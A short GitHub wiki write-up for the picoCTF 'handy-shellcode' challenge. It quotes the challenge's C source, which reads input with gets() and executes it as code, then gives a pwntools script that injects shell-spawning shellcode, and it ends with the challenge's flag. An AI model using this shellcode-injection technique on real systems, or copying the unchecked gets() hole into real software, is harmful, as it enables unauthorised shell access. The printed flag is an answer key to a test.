-
Notifications
You must be signed in to change notification settings - Fork 1
handy shellcode solution
cheaterdxd edited this page Oct 9, 2019
·
1 revision
This program executes any shellcode that you give it. Can you spawn a shell and use that to read the flag.txt? You can find the program in /problems/handy-shellcode_3_1a2e95a810eefe4a5994631812c0b8af on the shell server. Source.
You might be able to find some good shellcode online.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#define BUFSIZE 148
#define FLAGSIZE 128
void vuln(char *buf){
gets(buf);
puts(buf);
}
int main(int argc, char **argv){
setvbuf(stdout, NULL, _IONBF, 0);
// Set the gid to the effective gid
// this prevents /bin/sh from dropping the privileges
gid_t gid = getegid();
setresgid(gid, gid, gid);
char buf[BUFSIZE];
puts("Enter your shellcode:");
vuln(buf);
puts("Thanks! Executing now...");
((void (*)())buf)();
puts("Finishing Executing Shellcode. Exiting now...");
return 0;
}
In main function: Main function declare an buf array with len BUFSIZE = 148 Then in vuln( ) , gets(buf) then puts(buf) . And finally, they call buf( ) .
We can input to buf a shellcode, then when the function call buf, it will spawn a shell for us to cat flag.
s = process('./vuln')
shellcode = asm(shellcraft.i386.linux.sh())
s.sendline(shellcode)
s.interactive()
picoCTF{h4ndY_d4ndY_sh311c0d3_5843b402}